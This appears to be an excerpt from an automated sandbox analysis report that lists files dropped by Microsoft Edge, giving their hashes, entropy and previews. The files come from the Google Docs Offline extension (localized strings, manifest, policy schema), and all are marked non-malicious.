                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                Malicious:false
Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                Malicious:false
